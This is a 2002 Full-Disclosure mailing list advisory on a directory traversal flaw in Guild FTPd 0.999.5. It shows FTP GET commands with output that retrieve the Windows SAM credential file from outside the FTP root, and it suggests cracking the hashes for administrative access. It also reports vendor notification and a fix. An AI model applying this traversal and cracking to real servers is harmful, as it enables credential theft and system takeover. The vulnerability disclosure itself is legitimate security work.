[<prev] [next>] [day] [month] [year] [list]
From: full-disclosure at mike-c.com (Mike C)
Subject: Guild FTPd Exploit
______________________________________________________________________
Product Information
Guild FTPd 0.999.5
Released 4th July 2002
http://www.nitrolic.com
Guild FTPd is an ftp server which is growing ever more popular due to
its link with IRC. It can detect if the people on your FTP are in in
the same channels you are, and kick/ban them accordingly. This is
useful if you wish to keep your ftp data a little more private.
??????????????????????????????????????????????????????????????????????
____________________________________________________________
Exploit Information
Author: Mike C
Date: 7th September 2002
Description:
Using a simple exploit in Guild FTPd, we can download any
file on the same hard drive as the ftp root folder.
????????????????????????????????????????????????????????????
__________________________________________________
SAM SECURITY FILE
LOCAL PATH = C:\windows\repair\sam
FTP ROOT = C:\ftp
RELATIVE PATH = ../windows/repair/sam
??????????????????????????????????????????????????
1) We try to download the sam file using a relative path to the ftp root
ftp> GET "../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
425 Download failed.
ftp>
2) We get a 'Download failed' message, along with a filesize,
confirming the file exists. If the file doesn't exist, we get
'Access denied: File not found.'
3) Adding a / to the start of the relative path seems to bypass the
server's security relating to relative URLs. Note however,
that / doesn't escape the ftp root as you may except.
Where '../foo.bar' is not accessible, '/../foo.bar' is.
ftp> GET "/../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
226 Transfer complete. 24576 bytes in 1 sec. (24.58 Kb/s).
ftp: 24576 bytes received in 2.08Seconds 11.80Kbytes/sec.
ftp>
4) We have just successfully exploited the server, managing to
download the system's sam file. An application such as l0phtcrack
(http://www.atstake.com/research/lc/) could now be used to find
the passwords, thus giving full administrative access to the
exploited system.
______________________________________________________________________
Vendor Status:
The authors of Guild FTPd were notified on 7th September 2002.
The exploit has been fixed as of 8th September 2002.
A new version will be released on 15th September 2002.
??????????????????????????????????????????????????????????????????????
Powered by blists - more mailing lists